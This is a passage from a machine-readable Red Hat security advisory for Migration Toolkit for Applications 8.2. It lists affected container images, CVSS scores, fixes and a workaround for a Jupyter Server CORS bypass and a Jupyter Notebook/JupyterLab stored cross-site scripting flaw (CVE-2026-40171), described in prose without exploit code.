"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "jupyter-server: Jupyter Server: Cross-Origin Resource Sharing (CORS) bypass via improper Origin header validation"
},
{
"cve": "CVE-2026-40171",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2026-05-06T20:00:54.861152+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2467453"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Jupyter Notebook and JupyterLab. A stored cross-site scripting (XSS) vulnerability in the help command linker can be exploited by an attacker who crafts a malicious notebook file. When a user interacts with this file, the XSS is triggered, allowing the attacker to steal authentication tokens. Successful exploitation can lead to a complete takeover of the Jupyter session, enabling arbitrary code execution and information disclosure.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Jupyter Notebook: JupyterLab: @jupyter-notebook/help-extension: @jupyterlab/help-extension: Jupyter Notebook and JupyterLab: Session takeover via stored cross-site scripting",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important flaw in Jupyter Notebook and JupyterLab, enabling a stored cross-site scripting (XSS) attack. An attacker can craft a malicious notebook that, with a single user click, can steal authentication tokens and fully compromise the Jupyter session, leading to arbitrary code execution and information disclosure. This impacts Red Hat OpenShift AI and Migration Toolkit for Applications.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-40171"
},
{
"category": "external",
"summary": "RHBZ#2467453",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467453"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-40171",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-40171"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-40171",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40171"
},
{
"category": "external",
"summary": "https://github.com/jupyter/notebook/security/advisories/GHSA-rch3-82jr-f9w9",
"url": "https://github.com/jupyter/notebook/security/advisories/GHSA-rch3-82jr-f9w9"
}
],
"release_date": "2026-05-06T19:36:32.072000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
},
{
"category": "workaround",
"details": "To reduce the risk of exploitation, disable the affected help extensions in Jupyter Notebook and JupyterLab, or set the `allowCommandLinker` option to `false` within the sanitizer configuration. Consult the Jupyter documentation for specific instructions on modifying these settings. Disabling these features may affect the availability of certain help functionalities.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
